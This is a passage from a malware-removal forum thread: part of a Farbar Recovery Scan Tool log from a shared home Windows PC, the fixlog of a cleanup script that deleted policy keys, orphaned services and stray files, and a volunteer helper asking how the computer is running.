2014-11-01 09:22 - 2014-11-01 09:52 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-11-01 09:21 - 2014-11-01 09:52 - 00000000 ____D () C:\Users\Nick\Desktop\mbar
2014-11-01 09:20 - 2014-11-01 09:20 - 14349744 _____ (Malwarebytes Corp.) C:\Users\Nick\Desktop\mbar-1.07.0.1012.exe
2014-11-01 09:09 - 2014-11-01 09:09 - 00039769 _____ () C:\Users\Nick\Desktop\Addition.txt
2014-11-01 09:07 - 2014-11-02 07:07 - 00000000 ____D () C:\FRST
2014-11-01 08:52 - 2014-11-01 08:52 - 00854448 _____ () C:\Users\Nick\Desktop\SecurityCheck.exe
2014-10-28 11:23 - 2014-10-28 11:23 - 00000000 ____D () C:\Users\Nick\AppData\Roaming\UltraVNC
2014-10-28 11:14 - 2014-10-28 11:23 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UltraVNC
2014-10-28 11:14 - 2014-10-28 11:14 - 00000000 ____D () C:\Program Files\uvnc bvba
2014-10-26 20:28 - 2014-10-26 20:28 - 00291352 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2014-10-26 20:28 - 2014-10-26 20:28 - 00043152 _____ (AVAST Software) C:\Windows\avastSS.scr
2014-10-26 20:28 - 2014-10-26 20:28 - 00001842 _____ () C:\Users\Public\Desktop\Avast Free Antivirus.lnk
2014-10-26 20:18 - 2014-10-26 20:23 - 00004245 _____ () C:\Windows\system32\jupdate-1.7.0_71-b14.log
2014-10-26 19:55 - 2014-10-26 19:55 - 00000000 ____D () C:\Users\Hannah\AppData\Local\{C904B1C1-3E1E-4488-AF25-7A18B11AC300}
2014-10-26 18:59 - 2014-11-01 09:22 - 00113880 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-26 18:56 - 2014-10-26 18:56 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
2014-10-26 18:56 - 2014-10-26 18:56 - 00000000 ____D () C:\ProgramData\McAfee Security Scan
2014-10-26 18:56 - 2014-10-26 18:56 - 00000000 ____D () C:\Program Files\McAfee Security Scan
2014-10-26 17:22 - 2014-10-26 17:26 - 00000859 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-26 17:22 - 2014-10-26 17:22 - 00000000 ____D () C:\Users\Dylan\AppData\Roaming\Malwarebytes
2014-10-22 17:44 - 2014-10-22 17:45 - 00000000 ____D () C:\Users\Hannah\AppData\Local\{65D13997-5F32-456F-9964-9BB07D32E768}
2014-10-21 02:17 - 2014-06-15 14:18 - 01131664 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-21 02:17 - 2014-06-13 10:22 - 00156824 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-21 02:17 - 2014-06-13 10:22 - 00081560 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-21 02:16 - 2014-09-23 15:37 - 03637248 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-21 02:16 - 2014-09-23 15:37 - 00834048 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-21 02:16 - 2014-09-23 15:37 - 00671744 _____ (Microsoft Corporation) C:\Windows\system32\mstime.dll
2014-10-21 02:16 - 2014-09-23 15:37 - 00498688 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-21 02:16 - 2014-09-23 15:37 - 00480768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-21 02:16 - 2014-09-23 15:37 - 00380928 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-21 02:16 - 2014-09-23 15:37 - 00273408 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-21 02:16 - 2014-09-23 15:37 - 00193024 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2014-10-21 02:16 - 2014-09-23 15:37 - 00180736 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-21 02:16 - 2014-09-23 15:37 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-10-21 02:16 - 2014-09-23 15:37 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-21 02:16 - 2014-09-23 15:36 - 00347136 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-21 02:16 - 2014-09-23 15:36 - 00214528 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-21 02:16 - 2014-09-23 15:36 - 00019968 _____ (Microsoft Corporation) C:\Windows\system32\corpol.dll
2014-10-21 02:16 - 2014-09-23 14:27 - 01383424 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-21 02:15 - 2014-09-23 15:37 - 06119936 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-21 02:15 - 2014-09-23 15:37 - 01827328 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-21 02:15 - 2014-09-23 15:37 - 01177600 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-21 02:15 - 2014-09-23 10:05 - 00389632 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2014-10-21 02:13 - 2014-09-27 15:29 - 02054656 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-21 02:03 - 2014-09-04 15:27 - 00143360 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fastfat.sys
2014-10-21 02:00 - 2014-09-16 08:56 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-09 07:47 - 2014-10-09 07:47 - 00155248 _____ () C:\Windows\Minidump\Mini100914-01.dmp
2014-10-09 07:22 - 2014-10-09 07:22 - 00000000 ____D () C:\Users\Hannah\AppData\Local\{69E0C68D-60C0-41AE-8CBC-FD37C8FBD37E}

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-02 07:08 - 2010-11-25 20:52 - 00000416 ____H () C:\Windows\Tasks\User_Feed_Synchronization-{C479CE1A-76B9-4D6F-8D71-575C334B2024}.job
2014-11-02 07:07 - 2006-11-02 04:35 - 00000000 ____D () C:\Windows\system32\FxsTmp
2014-11-02 07:06 - 2012-04-03 10:24 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-02 07:05 - 2010-11-20 20:01 - 00000420 ____H () C:\Windows\Tasks\User_Feed_Synchronization-{F9D43FD3-5681-4AEF-A862-17FF1653F989}.job
2014-11-02 07:04 - 2010-11-20 19:35 - 00000878 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-11-02 07:01 - 2013-10-20 10:02 - 00807446 _____ () C:\Windows\PFRO.log
2014-11-02 07:01 - 2006-11-02 05:00 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-02 07:01 - 2006-11-02 04:46 - 00004048 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-02 07:01 - 2006-11-02 04:46 - 00004048 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-02 07:00 - 2012-04-18 15:44 - 01850397 _____ () C:\Windows\WindowsUpdate.log
2014-11-02 07:00 - 2006-11-02 05:00 - 00032556 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-11-02 06:53 - 2010-11-20 19:49 - 00000000 ____D () C:\Users\Nick
2014-11-02 06:53 - 2006-11-02 03:18 - 00000000 ___RD () C:\Users\Public
2014-11-02 06:33 - 2010-11-20 19:35 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-11-02 06:16 - 2013-04-10 13:22 - 00000904 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2927482541-673307907-4085399872-1003UA.job
2014-11-01 11:38 - 2012-04-27 18:39 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-11-01 11:03 - 2013-10-16 08:39 - 00000000 ____D () C:\ProgramData\Oracle
2014-11-01 11:01 - 2010-12-24 19:28 - 00000000 ____D () C:\Program Files\Opera
2014-11-01 10:59 - 2010-12-06 16:58 - 00000000 ____D () C:\Program Files\Java
2014-11-01 09:55 - 2014-08-31 10:57 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-11-01 07:16 - 2013-04-10 13:22 - 00000852 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2927482541-673307907-4085399872-1003Core.job
2014-10-31 20:28 - 2011-07-07 11:05 - 00787800 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsnx.sys
2014-10-31 20:28 - 2010-11-20 19:35 - 00070384 _____ (AVAST Software) C:\Windows\system32\Drivers\aswmonflt.sys
2014-10-28 16:14 - 2014-07-06 18:10 - 00000000 ____D () C:\ProgramData\65214779c8ff1a47
2014-10-28 16:02 - 2014-08-19 05:10 - 00000000 ____D () C:\Users\Bill\AppData\Roaming\DropboxMaster
2014-10-28 16:02 - 2011-08-22 16:24 - 00000000 ____D () C:\Users\Bill\AppData\Roaming\Dropbox
2014-10-28 11:06 - 2013-10-19 10:31 - 00004923 _____ () C:\Windows\setupact.log
2014-10-28 05:35 - 2010-11-21 09:12 - 00229000 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-26 20:54 - 2011-05-04 20:14 - 00000000 ____D () C:\Users\Hannah\AppData\Roaming\uTorrent
2014-10-26 20:53 - 2013-04-14 18:04 - 00000000 ____D () C:\Users\Hannah\Tracing
2014-10-26 20:53 - 2010-11-22 18:19 - 00000000 ____D () C:\Users\Hannah\AppData\Local\LogMeIn Hamachi
2014-10-26 20:52 - 2014-06-03 18:50 - 00000000 ____D () C:\Users\Hannah\AppData\Local\Backup Assistant Plus
2014-10-26 20:28 - 2014-08-01 10:54 - 00024184 _____ () C:\Windows\system32\Drivers\aswHwid.sys
2014-10-26 20:28 - 2013-09-07 16:22 - 00206248 _____ () C:\Windows\system32\Drivers\aswVmm.sys
2014-10-26 20:28 - 2013-09-07 16:22 - 00049944 _____ () C:\Windows\system32\Drivers\aswRvrt.sys
2014-10-26 20:28 - 2010-11-20 19:35 - 00422760 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsp.sys
2014-10-26 20:28 - 2010-11-20 19:35 - 00057928 _____ (AVAST Software) C:\Windows\system32\Drivers\aswTdi.sys
2014-10-26 20:28 - 2010-11-20 19:35 - 00055240 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr.sys
2014-10-26 20:02 - 2012-12-16 22:41 - 00000680 _____ () C:\Users\Dylan\AppData\Local\d3d9caps.dat
2014-10-26 18:57 - 2012-12-14 00:04 - 00000000 ____D () C:\Users\Dylan\AppData\Local\Adobe
2014-10-26 18:56 - 2012-04-03 10:24 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-10-26 18:56 - 2011-08-21 08:55 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-10-26 18:52 - 2012-10-20 18:44 - 00000000 ____D () C:\Windows\WinBrick.96
2014-10-26 17:26 - 2014-08-31 10:57 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-26 17:26 - 2014-08-31 10:57 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-21 02:52 - 2006-11-02 03:18 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-10-21 02:38 - 2006-11-02 04:46 - 03688432 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-21 02:12 - 2013-08-20 02:09 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-21 02:03 - 2006-11-02 02:24 - 100290944 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2014-10-09 08:07 - 2006-11-02 03:18 - 00000000 ____D () C:\Windows\rescache
2014-10-09 08:06 - 2014-09-28 15:10 - 00000000 ____D () C:\Users\Hannah\Desktop\Nick
2014-10-09 08:01 - 2010-12-25 10:51 - 00008192 _____ () C:\Users\Hannah\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-10-09 07:47 - 2011-01-14 20:43 - 00000000 ____D () C:\Windows\Minidump
2014-10-09 07:46 - 2013-12-12 08:39 - 274563712 _____ () C:\Windows\MEMORY.DMP

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-11-01 23:56

==================== End Of Log ============================

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 02-11-2014
Ran by Nick at 2014-11-02 06:53:32 Run:1
Running from C:\Users\Nick\Desktop
Loaded Profile: Nick (Available profiles: Kristi & Hannah & Nick & Bill & UpdatusUser & Dylan & Administrator)
Boot Mode: Normal

==============================================

Content of fixlist:
*****************
start
EmptyTemp:
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
CHR HKCU\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
S4 blbdrive; \SystemRoot\system32\drivers\blbdrive.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 lmimirr; system32\DRIVERS\lmimirr.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 radpms; system32\DRIVERS\radpms.sys [X]
C:\Users\Nick\random.dat
C:\Users\Public\replace.bat
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [AdobeBridge] => [X]
end
*****************

"HKLM\SOFTWARE\Policies\Google" => Key deleted successfully.
"HKCU\SOFTWARE\Policies\Google" => Key deleted successfully.
blbdrive => Service deleted successfully.
IpInIp => Service deleted successfully.
lmimirr => Service deleted successfully.
NwlnkFlt => Service deleted successfully.
NwlnkFwd => Service deleted successfully.
radpms => Service deleted successfully.
C:\Users\Nick\random.dat => Moved successfully.
C:\Users\Public\replace.bat => Moved successfully.
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\Software\Microsoft\Windows\CurrentVersion\Run\\AdobeBridge => value deleted successfully.
EmptyTemp: => Removed 2.3 GB temporary data.


The system needed a reboot.

==== End of Fixlog ====



#15 Jo*

  • Malware Response Team
Posted 02 November 2014 - 10:53 AM

How is the computer running now?

Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.




